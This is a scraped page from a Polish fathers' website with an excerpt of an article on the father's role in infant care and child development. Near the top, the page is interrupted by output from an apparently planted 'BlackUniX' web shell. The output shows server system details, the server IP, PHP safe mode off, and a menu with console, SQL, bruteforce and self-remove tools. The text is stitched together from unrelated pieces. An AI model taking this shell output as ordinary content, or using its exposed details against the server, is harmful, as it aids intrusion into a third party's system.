W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 01:59:48
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.91.246
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Tęsknota za ojcem, czyli z tatą przez prerie
12.09.2007.
ImagePrzeprowadzone ostatnio badania Michaela Yogmana udowodniły, że mężczyźni, którzy zajmują się dziećmi, są równie troskliwi i uważni jak kobiety wypełniające podobne obowiązki.
Rola, jaką ojciec może odgrywać wobec niemowlęcia, jest znacznie mniej ograniczona, niż dawniej sądzono. Jeżeli okoliczności tego wymagają, mężczyźni opiekują się dziećmi równie kompetentnie jak kobiety. Ojcowie są wrażliwi  na sygnały emocjonalne wysyłane przez dziecko w podobnym  stopniu jak matki i równie umiejętnie na nie odpowiadają.


{mos_sb_discuss:14}

(...)

Dziś obydwoje rodzice opiekują się dzieckiem od pierwszych dni jego życia, jednak nie istnieje idea “pierwotnego ojcostwa”, zadanie ojca nie polega bowiem  na byciu konkurencją dla matek.  Specjaliści przestrzegają nawet  przed źle pojętym  “nowym ojcostwem”, rozumianym jako wartość identyczną - a nie komplementarną - z macierzyństwem, która prowadziłaby do ujednolicenia, a nie zróżnicowania doświadczeń dziecka.

(...)

Oczywiście nie wszystkie dzieci wychowywane bez ojców muszą mieć problemy, a te żyjące z nim na co dzień nie mają wcale gwarancji prawidłowego rozwoju. Nie ulega jednak wątpliwości, że ojciec jest dla dziecka “obiektem istotnych relacji”. Obecność ojca w konstruktywny sposób rozbija symbiotyczną całość matka - dziecko i sprzyja rodzeniu się autonomii i procesowi indywidualizacji potomstwa. Mężczyzna jako dodatkowa “baza wypadowa” sprawia, że wszystkie wędrówki syna lub córki w świat wydają się bardziej bezpieczne. Ojciec pełni rolę pomostu między matką a światem zewnętrznym, pomagając dziecku w wyrabianiu pewności siebie potrzebnej do tego typu wypraw. Dzięki temu dziecko może zacząć tworzyć mapę relacji obrazującą funkcjonowanie społeczeństwa, co w przyszłości ułatwi mu sprawne poruszanie się w rzeczywistości społecznej.  


Całość czytaj w bycrodzicem.pl
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.